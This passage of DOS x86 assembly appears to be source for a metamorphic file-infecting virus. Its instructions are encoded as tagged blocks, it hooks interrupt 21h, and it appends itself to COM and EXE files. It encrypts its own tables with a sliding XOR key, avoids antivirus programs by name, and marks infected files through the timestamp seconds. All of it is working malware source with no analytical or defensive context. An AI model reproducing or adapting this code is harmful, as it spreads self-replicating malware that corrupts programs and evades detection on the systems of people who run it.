mov es,ax ; DS = segment of PSP for current ...
db 02h ; Two bytes instruction
mov ah,4ah ; Resize memory block
db 02h ; Two bytes instruction
int 21h
db 04h ; Four bytes instruction
lea bx,[bp+1234h] ; BX = offset of jmp_imm32_
db 11101101b ; Data reference
dw 1391h ; Pointer of jmp_imm32_
db 01h ; One byte instruction
pop ax ; Load AX from stack (initial IP)
db 04h ; Four bytes instruction
mov cs:[bx+01h],ax ; Store initial IP
db 01h ; One byte instruction
pop ax ; Load AX from stack (initial CS ...)
db 04h ; Four bytes instruction
mov cs:[bx+03h],ax ; Store initial CS relative to sta...
db 01h ; One byte instruction
pop ax ; Load AX from stack (initial SP)
db 01h ; One byte instruction
pop ss ; Load SS from stack (initial SS ...)
db 02h ; Two bytes instruction
mov sp,ax ; SP = stack pointer
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1391h ; Pointer of jmp_imm32_
db 11101111b ; End of block
jmp_imm32_ db 11101110b ; Beginning of block
dw 1391h ; Block identification of jmp_imm32_
db 05h+10h ; Five bytes data
db 11101010b ; JMP imm32 (opcode 0eah)
dd 00h ; Pointer to virus in top of memory
db 11101111b ; End of block
ah__ db 11101110b ; Beginning of block
dw 0bd9h ; Block identification of ah__
db 01h+10h ; One byte data
db 00h ; Accumulator register (high-orde...)
db 11101111b ; End of block
probability_ db 11101110b ; Beginning of block
dw 0bech ; Block identification of probabil...
db 02h+10h ; Two bytes data
dw 32h ; Probability
db 11101111b ; End of block
crypt_key_ db 11101110b ; Beginning of block
dw 0bd7h ; Block identification of crypt_key_
db 01h+10h ; One data byte
db 00h ; 8-bit encryption/decryption key
db 11101111b ; End of block
sliding_key_ db 11101110b ; Beginning of block
dw 0bd8h ; Block identification to sliding_...
db 02h+10h ; Two bytes data
dw 00h ; 8-bit sliding encryption/decrypt...
db 11101111b ; End of block
executa_sta db 11101110b ; Beginning of block
dw 1388h ; Block identification of executa_sta
db 01h+10h ; One byte data
db 00h ; Executable status
db 11101111b ; End of block
origin_code_ db 11101110b ; Beginning of block
dw 1f40h ; Block identification of origin_c...
db 03h+10h ; Three bytes data
db 11000011b,02h dup(00h)
db 11101111b ; End of block
incorr_code_ db 11101110b ; Beginning of block
dw 1776h ; Block identification of incorr_c...
db 03h+10h ; Three bytes data
db 11000011b,02h dup(00h)
db 11101111b ; End of block
initial_cs_ db 11101110b ; Beginning of block
dw 1389h ; Block identification of initial_cs_
db 02h+10h ; Two bytes data
dw 0fff0h ; Initial CS relative to start of ...
db 11101111b ; End of block
initial_ss_ db 11101110b ; Beginning of block
dw 138ah ; Block identification of initial_ss_
db 02h+10h ; Two bytes data
dw 0fff0h ; Initial SS relative to start of ...
db 11101111b ; End of block
initial_ip_ db 11101110b ; Beginning of block
dw 138bh ; Block identification of initial_ip_
db 02h+10h ; Two bytes data
dw 100h ; Initial IP
db 11101111b ; End of block
incorrec_ip db 11101110b ; Beginning of block
dw 1773h ; Block identification of incorrec_ip
db 02h+10h ; Two bytes data
dw 100h ; Incorrect IP
db 11101111b ; End of block
initial_sp_ db 11101110b ; Beginning of block
dw 138ch ; Block identification of initial_sp_
db 02h+10h ; Two bytes data
dw 0fffeh ; Initial SP
db 11101111b ; End of block
new_mcb_siz db 11101110b ; Beginning of block
dw 1393h ; Block identification of new_mcb_siz
db 02h+10h ; Two bytes data
dw 1000h ; New size in paragraphs
db 11101111b ; End of block
mcb_size__ db 11101110b ; Beginning of block
dw 1395h ; Block identification of mcb_size__
db 02h+10h ; Two bytes data
dw 0ffffh ; Size of memory block in paragraphs
db 11101111b ; End of block
mcb_size___ db 11101110b ; Beginning of block
dw 1394h ; Block identification of mcb_size___
db 02h+10h ; Two bytes data
dw 00h ; Size of memory block in paragraphs
db 11101111b ; End of block
program_seg_ db 11101110b ; Beginning of block
dw 0befh ; Block identification of program_...
db 02h+10h ; Two bytes data
dw 00h ; Segment of PSP for current process
db 11101111b ; End of block
virus_lengt db 11101110b ; Beginning of block
dw 0bf0h ; Block identification of virus_lengt
db 02h+10h ; Two bytes data
dw 00h ; Length of virus
db 11101111b ; End of block
vir_exit_of db 11101110b ; Beginning of block
dw 0bf1h ; Block identification of vir_exit_of
db 02h+10h ; Two bytes data
dw 00h ; Offset of virus_exit_
db 11101111b ; End of block
tmc_table_ db 11101110b ; Beginning of block
dw 4c5h ; Block identification of tmc_table_
db 11101111b ; End of block
db 00h ; End of table
second_table db 11101111b ; End of block
crypt_table db 11101110b ; Beginning of block
dw 66h ; Block identification of crypt_table
db 02h ; Two bytes instruction
xor bp,bp ; Zero BP
db 02h ; Two bytes instruction
mov ds,bp ; DS = segment of BIOS data segment
db 04h ; Four bytes instruction
mov bx,ds:[46dh] ; BX = timer ticks since midnight
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (CS)
db 03h ; Three bytes instruction
and bx,1111111111110000b
db 04h ; Four bytes instruction
mov ds:[1234h],bx ; Store timer ticks since midnight
db 11101101b ; Data reference
dw 13adh ; Pointer to timer_ticks
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bfeh ; Pointer to crypt_table_
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bd4h ; Pointer to get_rnd_num_
db 03h ; Three bytes instruction
mov ds:[1234h],al ; Store 8-bit encryption/decryptio...
db 11101101b ; Data reference
dw 0bd7h ; Pointer to crypt_key_
db 04h ; Four bytes instruction
mov ds:[1234h],ah ; Store 8-bit sliding encryption/d...
db 11101101b ; Data reference
dw 0bd8h ; Pointer to sliding_key_
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bfeh ; Pointer to crypt_table_
db 03h ; Three bytes instruction
mov ax,3521h ; Get interrupt vector 21h
db 02h ; Two bytes instruction
int 21h
db 03h ; Three bytes instruction
mov di,1234h ; DI = offset of int21_addr
db 11101101b ; Data reference
dw 0c9h ; Pointer to int21_addr
db 02h ; Two bytes instruction
mov [di],bx ; Store offset of interrupt 21h
db 03h ; Three bytes instruction
mov [di+02h],es ; Store segment of interrupt 21h
db 03h ; Three bytes instruction
mov dx,1234h ; DX = offset of int21_virus
db 11101101b ; Data reference
dw 0c8h ; Pointer to int21_virus
db 03h ; Three bytes instruction
mov ax,2521h ; Set interrupt vector 21h
db 02h ; Two bytes instruction
int 21h
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 65h ; Pointer to virus_exit_
db 11101111b ; End of block
crypt_table_ db 11101110b ; Beginning of block
dw 0bfeh ; Block identification of crypt_ta...
db 03h ; Three bytes instruction
mov si,1234h ; SI = offset of tmc_table_
db 11101101b ; Data reference
dw 4c5h ; Pointer to tmc_table_
db 03h ; Three bytes instruction
mov cx,(code_end-first_table)
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0bffh ; Pointer to crypt_loop
db 11101111b ; End of block
crypt_loop db 11101110b ; Beginning of block
dw 0bffh ; Block identification of crypt_loop
db 02h ; Two bytes instruction
xor [si],al ; Encrypt byte of table
db 01h ; One byte instruction
inc si ; Increase offset within table
db 02h ; Two bytes instruction
add al,ah ; Add 8-bit sliding encryption key...
db 01h ; One byte instruction
dec cx ; Decrease counter
db 01110101b+10000000b ; Not zero? Jump to crypt_loop
dw 0bffh ; Pointer to crypt_loop
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
int21_virus db 11101110b ; Beginning of block
dw 0c8h ; Block identification of int21_virus
db 01h ; One byte instruction
cld ; Clear direction flag
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a0h ; Pointer to push_regs
db 03h ; Three bytes instruction
cmp ah,3ch ; Create file?
db 01110100b+10000000b ; Equal? Jump to exam_drv_let
dw 139ah ; Pointer to exam_drv_let
db 03h ; Three bytes instruction
cmp ah,3dh ; Open file?
db 01110100b+10000000b ; Equal? Jump to exam_drv_let
dw 139ah ; Pointer to exam_drv_let
db 03h ; Three bytes instruction
cmp ah,3eh ; Close file?
db 01110100b+10000000b ; Equal? Jump to infect_fil
dw 139ch ; Pointer to infect_fil
db 03h ; Three bytes instruction
cmp ah,4bh ; Load and/or execute program?
db 01110101b+10000000b ; Not equal? Jump to int21_exit
dw 13a6h ; Pointer to int21_exit
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 13a9h ; Pointer to infect_file
db 11101111b ; End of block
infect_file db 11101110b ; Beginning of block
dw 13a9h ; Block identification of infect_file
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 1392h ; Pointer to infect_fil_
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 13a6h ; Pointer to int21_exit
db 11101111b ; End of block
int21_exit db 11101110b ; Beginning of block
dw 13a6h ; Block identification of int21_exit
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a1h ; Pointer to pop_regs
db 05h ; Five bytes instruction
jmp dword ptr cs:[1234h]
db 11101101b ; Data reference
dw 0c9h ; Pointer to int21_addr
db 11101111b ; End of block
exam_drv_let db 11101110b ; Beginning of block
dw 139ah ; Block identification of exam_drv...
db 02h ; Two bytes instruction
mov si,dx ; SI = offset of filename
db 01h ; One byte instruction
lodsb ; AL = first byte of filename
db 03h ; Three bytes instruction
cmp byte ptr [si],':' ; Does filename include drive letter?
db 01110101b+10000000b ; Not equal? Jump to exam_def_drv
dw 139bh ; Pointer to exam_def_drv
db 02h ; Two bytes instruction
or al,20h ; Lowercase character
db 02h ; Two bytes instruction
cmp al,'b' ; Floppy disk?
db 01110111b+10000000b ; Above? Jump to int21_exit
dw 13a6h ; Pointer to int21_exit
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 13a8h ; Pointer to infect_file_
db 11101111b ; End of block
exam_def_drv db 11101110b ; Beginning of block
dw 139bh ; Block identification of exam_def...
db 01h ; One byte instruction
push ax ; Save AX at stack
db 02h ; Two bytes instruction
mov ah,19h ; Get current default drive
db 02h ; Two bytes instruction
int 21h
db 02h ; Two bytes instruction
cmp al,01h ; Floppy disk?
db 01h ; One byte instruction
pop ax ; Load AX from stack
db 01110111b+10000000b ; Above? Jump to int21_exit
dw 13a6h ; Pointer to int21_exit
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 13a8h ; Pointer to infect_file_
db 11101111b ; End of block
infect_file_ db 11101110b ; Beginning of block
dw 13a8h ; Block identification of infect_f...
db 03h ; Three bytes instruction
cmp ah,3ch ; Create file?
db 01110101b+10000000b ; Not equal? Jump to infect_file
dw 13a9h ; Pointer to infect_file
db 02h ; Two bytes instruction
xor bx,bx ; Zero file handle
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13abh ; Pointer to exam_psp_etc
db 01110101b+10000000b ; Not zero? Jump to int21_exit
dw 13a6h ; Pointer to int21_exit
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a4h ; Pointer to int24_store
db 02h ; Two bytes instruction
mov ah,60h ; Canonicalize filename or path
db 01h ; One byte instruction
dec si ; SI = offset of filename
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
pop es ; Load ES from stack (CS)
db 03h ; Three bytes instruction
mov di,1234h ; DI = offset of filename
db 11101101b ; Data reference
dw 139eh ; Pointer to filename
db 02h ; Two bytes instruction
int 21h
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a1h ; Pointer to pop_regs
db 01h ; One byte instruction
pushf ; Save flags at stack
db 05h ; Five bytes instruction
call dword ptr cs:[1234h]
db 11101101b ; Data reference
dw 0c9h ; Pointer to int21_addr
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a0h ; Pointer to push_regs
db 01h ; One byte instruction
pushf ; Save flags at stack
db 03h ; Three bytes instruction
mov bx,1111111111111111b
db 03h ; Three bytes instruction
adc bx,00h ; BX = file handle mask
db 02h ; Two bytes instruction
and ax,bx ; AX = file handle
db 04h ; Four bytes instruction
mov cs:[1234h],ax ; Store file handle
db 11101101b ; Data reference
dw 139dh ; Pointer to file_handle
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a5h ; Pointer to int24_load
db 01h ; One byte instruction
popf ; Load flags from stack
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a1h ; Pointer to pop_regs
db 01h ; One byte instruction
sti ; Set interrupt-enable flag
db 03h ; Three bytes instruction
retf 02h ; Return far and ???
db 11101111b ; End of block
infect_fil db 11101110b ; Beginning of block
dw 139ch ; Block identification of infect_fil
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13abh ; Pointer to exam_psp_etc
db 01110010b+10000000b ; Store segment of PSP for current...
dw 13a6h ; Pointer to int21_exit
db 02h ; Two bytes instruction
xor ax,ax ; Zero file handle
db 04h ; Four bytes instruction
mov cs:[1234h],ax ; Store file handle
db 11101101b ; Data reference
dw 139dh ; Pointer to file_handle
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a1h ; Pointer to pop_regs
db 01h ; One byte instruction
pushf ; Save flags at stack
db 05h ; Five bytes instruction
call dword ptr cs:[1234h]
db 11101101b ; Data reference
dw 0c9h ; Pointer to int21_addr
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a0h ; Pointer to push_regs
db 01h ; One byte instruction
pushf ; Save flags at stack
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (CS)
db 03h ; Three bytes instruction
mov dx,1234h ; DX = offset of filename
db 11101101b ; Data reference
dw 139eh ; Pointer to filename
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 1392h ; Pointer to infect_fil_
db 01h ; One byte instruction
popf ; Load flags from stack
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a1h ; Pointer to pop_regs
db 01h ; One byte instruction
sti ; Set interrupt-enable flag
db 03h ; Three bytes instruction
retf 02h ; Return far and ???
db 11101111b ; End of block
exam_psp_etc db 11101110b ; Beginning of block
dw 13abh ; Block identification of exam_psp...
db 01h ; One byte instruction
push bx ; Save BX at stack
db 02h ; Two bytes instruction
mov ah,62h ; Get current PSP address
db 02h ; Two bytes instruction
int 21h
db 03h ; Three bytes instruction
mov di,1234h ; DI = offset of progra_seg
db 11101101b ; Data reference
dw 139fh ; Pointer to progra_seg
db 03h ; Three bytes instruction
cmp cs:[di],bx ; Segment of PSP for current proc...?
db 03h ; Three bytes instruction
mov cs:[di],bx ; Store segment of PSP for current...
db 03h ; Three bytes instruction
mov di,1234h ; DI = offset of file_handle
db 11101101b ; Data reference
dw 139dh ; Pointer to file_handle
db 01110101b+10000000b ; Not equal? Jump to dont_infect
dw 13ach ; Pointer to dont_infect
db 01h ; One byte instruction
pop bx ; Load BX from stack
db 02h ; Two bytes instruction
mov ax,bx ; AX = file handle
db 03h ; Three bytes instruction
sub ax,cs:[di] ; Subtract saved file handle from ...
db 03h ; Three bytes instruction
add ax,0ffffh ; Add sixty-five thousand five hun...
db 01h ; One byte instruction
inc ax ; Increase file handle
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
dont_infect db 11101110b ; Beginning of block
dw 13ach ; Block identification of dont_infect
db 05h ; Five bytes instruction
mov word ptr cs:[di],00h
db 02h ; Two bytes instruction
xor ax,ax ; Zero file handle
db 01h ; One byte instruction
pop bx ; Load BX from stack
db 01h ; One byte instruction
stc ; Set carry flag
db 01h ; One byte instruction
ret ; Return
db 11101111b ; End of block
infect_fil_ db 11101110b ; Beginning of block
dw 1392h ; Block identification of infect_fil_
db 01h ; One byte instruction
push ds ; Save DS at stack
db 01h ; One byte instruction
pop es ; Load ES from stack (DS)
db 02h ; Two bytes instruction
mov di,dx ; DI = offset of filename
db 03h ; Three bytes instruction
mov cx,43h ; CX = number of bytes to search t...
db 02h ; Two bytes instruction
xor al,al ; Zero AL
db 02h ; Two bytes instruction
repne scasb ; Find end of filename
db 01110101b+10000000b ; Not equal? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
lea si,[di-05h] ; SI = offset of the dot in the fi...
db 01h ; One byte instruction
lodsw ; AX = two bytes of filename
db 03h ; Three bytes instruction
or ax,2020h ; Lowercase characters
db 03h ; Three bytes instruction
mov bx,'mo' ; COM executable
db 03h ; Three bytes instruction
cmp ax,'c.' ; COM executable?
db 01110100b+10000000b ; Equal? Jump to examine_ext
dw 0f0h ; Pointer to examine_ext
db 03h ; Three bytes instruction
mov bx,'ex' ; EXE executable
db 03h ; Three bytes instruction
cmp ax,'e.' ; EXE executable?
db 01110100b+10000000b ; Equal? Jump to examine_ext
dw 0f0h ; Pointer to examine_ext
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0fbh ; Pointer to infect_exit_
db 11101111b ; End of block
examine_ext db 11101110b ; Beginning of block
dw 0f0h ; Block identification of examine_ext
db 01h ; One byte instruction
lodsw ; AX = two bytes of filename
db 03h ; Three bytes instruction
or ax,2020h ; Lowercase characters
db 02h ; Two bytes instruction
cmp ax,bx ; COM or EXE executable?
db 01110101b+10000000b ; Not equal? Jump to examine_ext
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
sub si,04h ; SI = offset of the dot in the fi...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1398h ; Pointer to find_name
db 11101111b ; End of block
find_name db 11101110b ; Beginning of block
dw 1398h ; Block identification of find_name
db 01h ; One byte instruction
dec si ; SI = offset within filename
db 02h ; Two bytes instruction
mov al,[si] ; AL = byte of filename
db 02h ; Two bytes instruction
cmp al,'/' ; Beginning of filename?
db 01110100b+10000000b ; Equal? Jump to examine_name
dw 1397h ; Pointer to examine_name
db 02h ; Two bytes instruction
cmp al,'\' ; Beginning of filename?
db 01110100b+10000000b ; Equal? Jump to examine_name
dw 1397h ; Pointer to examine_name
db 02h ; Two bytes instruction
cmp al,':' ; Beginning of filename?
db 01110100b+10000000b ; Equal? Jump to examine_name
dw 1397h ; Pointer to examine_name
db 02h ; Two bytes instruction
cmp si,dx ; Beginning of filename?
db 01110111b+10000000b ; Above? Jump to find_name
dw 1398h ; Pointer to find_name
db 01h ; One byte instruction
dec si ; SI = offset within filename
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1397h ; Pointer to examine_name
db 11101111b ; End of block
examine_name db 11101110b ; Beginning of block
dw 1397h ; Block identification of examine_...
db 01h ; One byte instruction
inc si ; SI = offset of beginning of file...
db 01h ; One byte instruction
lodsw ; AX = two bytes of filename
db 03h ; Three bytes instruction
or ax,2020h ; Lowercase characters
db 03h ; Three bytes instruction
xor ax,0aa55h ; Encrypt two bytes of filename
db 03h ; Three bytes instruction
cmp ax,('ci' xor 0aa55h)
db 01110100b+10000000b ; Equal? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('on' xor 0aa55h)
db 01110100b+10000000b ; NOD-iCE? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('ew' xor 0aa55h)
db 01110100b+10000000b ; Dr. Web? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('bt' xor 0aa55h)
db 01110100b+10000000b ; ThunderByte Anti-Virus? Jump to ...
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('va' xor 0aa55h)
db 01110100b+10000000b ; AntiViral Toolkit Pro? Jump to i...
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('-f' xor 0aa55h)
db 01110100b+10000000b ; F-PROT? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('cs' xor 0aa55h)
db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_...
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('lc' xor 0aa55h)
db 01110100b+10000000b ; McAfee ViruScan? Jump to infect_...
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('oc' xor 0aa55h)
db 01110100b+10000000b ; COMMAND.COM? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('iw' xor 0aa55h)
db 01110100b+10000000b ; WIN.COM? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 03h ; Three bytes instruction
cmp ax,('rk' xor 0aa55h)
db 01110100b+10000000b ; Equal? Jump to infect_exit_
dw 0fbh ; Pointer to infect_exit_
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 13a4h ; Pointer to int24_store
db 03h ; Three bytes instruction
mov ax,3d02h ; Open file (read/write)
db 01h ; One byte instruction
pushf ; Save flags at stack
db 05h ; Five bytes instruction
call dword ptr cs:[1234h]
db 11101101b ; Data reference
dw 0c9h ; Pointer to int21_addr
db 01110010b+10000000b ; Error? Jump to terminate_
dw 1771h ; Pointer to infect_exit
db 02h ; Two bytes instruction
mov bx,ax ; BX = file handle
db 02h ; Two bytes instruction
xor ax,ax ; Zero AX
db 02h ; Two bytes instruction
mov ds,ax ; DS = segment of BIOS data segment
db 04h ; Four bytes instruction
mov si,ds:[46dh] ; SI = timer ticks since midnight
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
push cs ; Save CS at stack
db 01h ; One byte instruction
pop ds ; Load DS from stack (CS)
db 01h ; One byte instruction
pop es ; Load ES from stack (CS)
db 03h ; Three bytes instruction
mov ax,5700h ; Get file's date and time
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to close_file
dw 0fah ; Pointer to close_file
db 04h ; Four bytes instruction
mov ds:[1234h],dx ; Store file's date
db 11101101b ; Data reference
dw 12dh ; Pointer to file_date
db 02h ; Two bytes instruction
mov al,cl ; AL = low-order byte of file time
db 02h ; Two bytes instruction
and al,00011111b ; AL = file seconds
db 02h ; Two bytes instruction
cmp al,00000100b ; Already infected (8 seconds)?
db 01110100b+10000000b ; Equal? Jump to close_file
dw 0fah ; Pointer to close_file
db 03h ; Three bytes instruction
and cl,11100000b ; Zero file seconds
db 03h ; Three bytes instruction
or cl,00000100b ; Set infection mark (8 seconds)
db 04h ; Four bytes instruction
mov ds:[1234h],cx ; Store file's time
db 11101101b ; Data reference
dw 12ch ; Pointer to file_time
db 03h ; Three bytes instruction
and si,1111111111110000b
db 04h ; Four bytes instruction
cmp ds:[1234h],si ; Infect file?
db 11101101b ; Data reference
dw 13adh ; Pointer to timer_ticks
db 01110100b+10000000b ; Equal? Jump to close_file
dw 0fah ; Pointer to close_file
db 04h ; Four bytes instruction
mov ds:[1234h],si ; Store timer ticks since midnight
db 11101101b ; Data reference
dw 13adh ; Pointer to timer_ticks
db 02h ; Two bytes instruction
mov ah,3fh ; Read from file
db 03h ; Three bytes instruction
mov cx,18h ; Read twenty-four bytes
db 03h ; Three bytes instruction
mov dx,1234h ; DX = offset of exe_header
db 11101101b ; Data reference
dw 138fh ; Pointer to exe_header
db 02h ; Two bytes instruction
mov si,dx ; SI = offset of exe_header
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to close_file
dw 0fah ; Pointer to close_file
db 03h ; Three bytes instruction
mov ax,4202h ; Set current file position (EOF)
db 01h ; One byte instruction
cwd ; DX = high-order word of offset f...
db 02h ; Two bytes instruction
xor cx,cx ; CX = high-order word of offset f...
db 02h ; Two bytes instruction
int 21h
db 06h ; Six bytes instruction
mov ds:[00h],0010111010001101b
db 04h ; Four bytes instruction
cmp [si],'ZM' ; EXE signature?
db 01110100b+10000000b ; Equal? Jump to infect_exe
dw 138dh ; Pointer to infect_exe
db 04h ; Four bytes instruction
cmp [si],'MZ' ; EXE signature?
db 01110100b+10000000b ; Equal? Jump to infect_exe
dw 138dh ; Pointer to infect_exe
db 04h ; Four bytes instruction
mov ds:[1234h],cl ; Store executable status
db 11101101b ; Data reference
dw 1388h ; Pointer to executa_sta
db 03h ; Three bytes instruction
cmp ax,0bb8h ; Too small in filesize?
db 01110010b+10000000b ; Below? Jump to close_file
dw 0fah ; Pointer to close_file
db 03h ; Three bytes instruction
cmp ax,0dea8h ; Too large in filesize?
db 01110111b+10000000b ; Above? Jump to close_file
dw 0fah ; Pointer to close_file
db 01h ; One byte instruction
push si ; Save SI at stack
db 03h ; Three bytes instruction
mov di,1234h ; DI = offset of exe_header
db 11101101b ; Data reference
dw 138fh ; Pointer to exe_header
db 02h ; Two bytes instruction
mov cl,[di] ; CL = first byte of original code...
db 03h ; Three bytes instruction
mov byte ptr [di],11101001b
db 01h ; One byte instruction
inc di ; DI = offset within exe_header
db 04h ; Four bytes instruction
mov ds:[1234h],cl ; Store first byte of original cod...
db 11101101b ; Data reference
dw 1f40h ; Pointer to origin_code_
db 04h ; Four bytes instruction
mov ds:[1234h],cl ; Store first byte of original cod...
db 11101101b ; Data reference
dw 1776h ; Pointer to incorr_code_
db 02h ; Two bytes instruction
mov cx,[di] ; CX = word of original code of in...
db 03h ; Three bytes instruction
mov si,1234h ; SI = offset of origin_code_
db 11101101b ; Data reference
dw 1f40h ; Pointer to origin_code_
db 03h ; Three bytes instruction
mov [si+01h],cx ; Store word of original code of i...
db 03h ; Three bytes instruction
sub ax,03h ; AX = offset of virus within infe...
db 01h ; One byte instruction
stosw ; Store offset of virus within inf...
db 03h ; Three bytes instruction
mov ax,14h ; AX = probability of storing inco...
db 04h ; Four bytes instruction
cmp ds:[1234h],ax ; Store incorrect IP?
db 11101101b ; Data reference
dw 0bech ; Pointer to probability_
db 01110111b+10000000b ; Above? Jump to write_virus
dw 13afh ; Pointer to dont_corrupt
db 03h ; Three bytes instruction
mov bp,10h ; Random number within sixteen
db 11101000b ; CALL imm16 (opcode 0e8h)
dw 0bd5h ; Pointer to rnd_in_rang
db 03h ; Three bytes instruction
sub ax,08h ; Subtract eight from random number
db 02h ; Two bytes instruction
add cx,ax ; Add random number to word of ori...
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 13afh ; Pointer to dont_corrupt
db 11101111b ; End of block
dont_corrupt db 11101110b ; Beginning of block
dw 13afh ; Block identification of dont_cor...
db 03h ; Three bytes instruction
mov si,1234h ; SI = offset of incorr_code_
db 11101101b ; Data reference
dw 1776h ; Pointer to incorr_code_
db 03h ; Three bytes instruction
mov [si+01h],cx ; Store word of original code of i...
db 01h ; One byte instruction
pop si ; Load SI from stack
db 03h ; Three bytes instruction
mov ax,0fff0h ; AX = initial CS and SS relative ...
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial CS relative to sta...
db 11101101b ; Data reference
dw 1389h ; Pointer to initial_cs_
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial SS relative to sta...
db 11101101b ; Data reference
dw 138ah ; Pointer to initial_ss_
db 03h ; Three bytes instruction
mov ax,100h ; AX = initial IP
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial IP
db 11101101b ; Data reference
dw 138bh ; Pointer to initial IP
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial IP
db 11101101b ; Data reference
dw 1773h ; Pointer to incorrec_ip
db 03h ; Three bytes instruction
mov ax,0fffeh ; AX = initial SP
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store initial SP
db 11101101b ; Data reference
dw 138ch ; Pointer to initial_sp_
db 01h ; One byte instruction
inc ax ; Increase size of memory block in...
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store size of memory block in pa...
db 11101101b ; Data reference
dw 1395h ; Pointer to mcb_size__
db 03h ; Three bytes instruction
mov ax,1000h ; AX = new size in paragraphs
db 03h ; Three bytes instruction
mov ds:[1234h],ax ; Store new size in paragraphs
db 11101101b ; Data reference
dw 1393h ; Pointer to new_mcb_siz
db 03h ; Three bytes instruction
mov ax,4202h ; Set current file position (EOF)
db 01h ; One byte instruction
cwd ; DX = low-order word of offset f...
db 02h ; Two bytes instruction
xor cx,cx ; CX = high-order word of offset f...
db 02h ; Two bytes instruction
int 21h
db 03h ; Three bytes instruction
add ax,100h ; AX = delta offset
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 138eh ; Pointer to write_virus
db 11101111b ; End of block
write_virus db 11101110b ; Beginning of block
dw 138eh ; Block identification of write_virus
db 03h ; Three bytes instruction
mov ds:[02h],ax ; Store delta offset
db 02h ; Two bytes instruction
mov ah,40h ; Write to file
db 01h ; Two bytes instruction
cwd ; Zero DX
db 03h ; Three bytes instruction
mov cx,1234h ; CX = length of virus
db 11101101b ; Data reference
dw 66h ; Pointer to virus_end
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to close_file
dw 0fah ; Pointer to close_file
db 03h ; Three bytes instruction
mov ax,4200h ; Set current file position (SOF)
db 01h ; One byte instruction
cwd ; DX = low-order word of offset f...
db 02h ; Two bytes instruction
xor cx,cx ; CX = high-order word of offset f...
db 02h ; Two bytes instruction
int 21h
db 02h ; Two bytes instruction
mov ah,40h ; Write to file
db 02h ; Two bytes instruction
mov dx,si ; DX = offset of exe_header
db 03h ; Three bytes instruction
mov cx,18h ; Write twenty-four bytes
db 02h ; Two bytes instruction
int 21h
db 01110010b+10000000b ; Error? Jump to close_file
dw 0fah ; Pointer to close_file
db 03h ; Three bytes instruction
mov ax,5701h ; Set file's date and time
db 04h ; Four bytes instruction
mov cx,ds:[1234h] ; CX = new time
db 11101101b ; Data reference
dw 12ch ; Pointer to file_time
db 04h ; Four bytes instruction
mov dx,ds:[1234h] ; DX = new date
db 11101101b ; Data reference
dw 12dh ; Pointer to file_date
db 02h ; Two bytes instruction
int 21h
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 0fah ; Pointer to close_file
db 11101111b ; End of block
close_file db 11101110b ; Beginning of block
dw 0fah ; Block identification of close_file
db 02h ; Two bytes instruction
mov ah,3eh ; Close file
db 02h ; Two bytes instruction
int 21h
db 11101001b ; JMP imm16 (opcode 0e9h)
dw 1771h ; Pointer to infect_exit
db 11101111b ; End of block
